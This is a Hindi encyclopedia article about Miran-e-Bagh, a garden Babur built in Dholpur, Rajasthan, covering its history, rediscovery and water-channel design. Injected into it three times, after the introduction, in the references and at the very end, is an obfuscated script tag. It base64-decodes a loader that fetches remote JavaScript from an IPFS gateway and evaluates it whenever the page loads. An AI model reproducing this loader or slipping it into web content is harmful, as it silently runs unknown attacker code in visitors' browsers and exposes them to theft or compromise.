मीरान-ए-बाग़

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.

मीरान-ए-बाग़ धौलपुर, राजस्थान में स्थित है। यह बाग़ कई दशकों से उपेक्षा का शिकार रहा है, किंतु अब इसकी दशा सुधारने के लिए 'पुरातत्त्व एवं पर्यटन विभाग' ने महत्त्वपूर्ण प्रयास शुरु किये हैं। कभी 'बाबर गार्डन' के नाम से प्रसिद्ध इस बाग़ को पर्यटन स्थल के रूप में विकसित करने की योजना है।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

निर्माण

मुग़ल बादशाह बाबर ने अपने आरामगाह के रूप में वर्ष 1527 ई. में इसका निर्माण करवाया था। बाबर यहां युद्ध के सिलसिले में आया था और उसे यहीं पर ढाई साल तक रुकना पड़ गया था। ऐसे में उसने अपने आरामगाह एवं शिकारगाह के रूप में इस बाग़ का निर्माण करवाया।[1]

खोज

'बाबर गार्डन' की खोज वर्ष 1978 में भारत में तत्कालीन अमरीकी राजदूत की पत्नी एवं इतिहासकार डेनियल मोनिहटन ने की थी। वह बाबर की आत्मकथा 'तुजुक-ए-बाबरी' को पढ़कर यहाँ पहुंची थी। यहाँ आने के बाद उन्होंने इस किताब में दिए स्थानों की खुदाई कराई। इस खुदाई में कई प्राचीन संरचनाओं के अवशेष मिले। उसके बाद 'पुरातत्त्व विभाग' ने भी यहाँ आकर संरचनाओं का अध्ययन किया और 2 अक्टूबर, 1989 को इसे आरक्षित क्षेत्र घोषित कर सूचना जारी कर दी। इससे पहले 1933 में तत्कालीन नरेश के नायब सरदार रणबीर सिंह द्वारा लिखित पुस्तक 'धौलपुर गजट' एवं गुलबदन बेगम द्वारा रचित 'गुल-ए-नगमा' में भी इसका ज़िक्र है।

संरचना

आगरा एवं कश्मीरी शैली में बने मीरान-ए-बाग़ के चारों कोनों पर कुएं एवं बीच में बनी बावड़ी हमेशा पानी से लबालब भरी रहती थी। बाग़ के बीच में ही पत्थरों को काटकर कमल की पंखुड़ियों के रूप में बने छोटे-छोटे तालाब एवं फव्वारे इसके आकर्षण के प्रमुख केंद्र है। इसी विशेषता के चलते इसे 'कमल गार्डन' भी कहते हैं। इस बाग़ में गुप्त नालियों के जरिए बावड़ी से ही पानी की सप्लाई होती थी। इन नालियों के अवशेष अभी भी कई जगह देखे जा सकते हैं।[1]


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. 1.0 1.1 अब मीरान ए बाग का होगा विकास (हिन्दी) दैनिक भास्कर। अभिगमन तिथि: 05 अक्टूबर, 2014।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>